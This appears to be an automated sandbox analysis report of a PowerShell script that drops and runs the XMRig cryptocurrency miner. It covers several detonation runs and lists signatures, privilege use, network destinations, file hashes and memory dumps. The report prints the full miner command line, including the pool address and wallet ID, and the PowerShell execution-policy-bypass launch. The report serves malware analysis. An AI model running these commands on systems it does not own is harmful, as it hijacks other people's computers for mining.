| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2008 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2008 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
Files
memory/2008-0-0x00007FFEF97C3000-0x00007FFEF97C5000-memory.dmp
memory/2008-6-0x000001EE1EEB0000-0x000001EE1EED2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zf2qmvzk.vdl.psm1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2008-11-0x00007FFEF97C0000-0x00007FFEFA281000-memory.dmp
memory/2008-12-0x00007FFEF97C0000-0x00007FFEFA281000-memory.dmp
memory/2008-14-0x00007FFEF97C0000-0x00007FFEFA281000-memory.dmp
memory/2008-15-0x000001EE1FC80000-0x000001EE1FC92000-memory.dmp
memory/2008-16-0x000001EE1FB00000-0x000001EE1FB0A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2608-47-0x000002143D730000-0x000002143D750000-memory.dmp
memory/2608-48-0x000002143F030000-0x000002143F050000-memory.dmp
memory/2608-49-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-53-0x00000214D1C30000-0x00000214D1C50000-memory.dmp
memory/2608-52-0x000002143F050000-0x000002143F070000-memory.dmp
memory/2008-51-0x00007FFEF97C3000-0x00007FFEF97C5000-memory.dmp
memory/2608-50-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2008-54-0x00007FFEF97C0000-0x00007FFEFA281000-memory.dmp
memory/2608-55-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-56-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-58-0x00000214D1C30000-0x00000214D1C50000-memory.dmp
memory/2608-57-0x000002143F050000-0x000002143F070000-memory.dmp
memory/2608-59-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-60-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-61-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-62-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-63-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-64-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-65-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-66-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-67-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-68-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-69-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-70-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-71-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-72-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-73-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-74-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-75-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-76-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-77-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-78-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-79-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-80-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-81-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-82-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-83-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-84-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-85-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-86-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-87-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-88-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-89-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-90-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-91-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-92-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-93-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-94-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-95-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-96-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-97-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-98-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-99-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-100-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-101-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-102-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-103-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-104-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-105-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-106-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-107-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-108-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-109-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-110-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-111-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-112-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-113-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-114-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-115-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-116-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
memory/2608-117-0x00007FF7E7B00000-0x00007FF7E8733000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:47
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2440 wrote to memory of 4248 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2440 wrote to memory of 4248 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/2440-0-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp
memory/2440-1-0x0000021135E80000-0x0000021135EA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4x21pbfe.0r4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2440-10-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/2440-12-0x0000021136370000-0x0000021136382000-memory.dmp
memory/2440-13-0x0000021136350000-0x000002113635A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4248-44-0x00000288077D0000-0x00000288077F0000-memory.dmp
memory/4248-45-0x00000288092E0000-0x0000028809300000-memory.dmp
memory/4248-46-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/2440-47-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/4248-49-0x0000028809320000-0x0000028809340000-memory.dmp
memory/4248-48-0x0000028809300000-0x0000028809320000-memory.dmp
memory/2440-51-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp
memory/4248-50-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/2440-52-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/4248-53-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-54-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-56-0x0000028809320000-0x0000028809340000-memory.dmp
memory/4248-55-0x0000028809300000-0x0000028809320000-memory.dmp
memory/4248-57-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-58-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-59-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-60-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-61-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-62-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-63-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-64-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-65-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-66-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-67-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-68-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-69-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-70-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-71-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-72-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-73-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-74-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-75-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-76-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-77-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-78-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-79-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-80-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-81-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-82-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-83-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-84-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-85-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-86-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-87-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-88-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-89-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-90-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-91-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-92-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-93-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-94-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-95-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-96-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-97-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-98-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-99-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-100-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-101-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-102-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-103-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-104-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-105-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-106-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-107-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-108-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-109-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-110-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-111-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-112-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-113-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-114-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
memory/4248-115-0x00007FF6C7E80000-0x00007FF6C8AB3000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:51
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4444 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4444 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
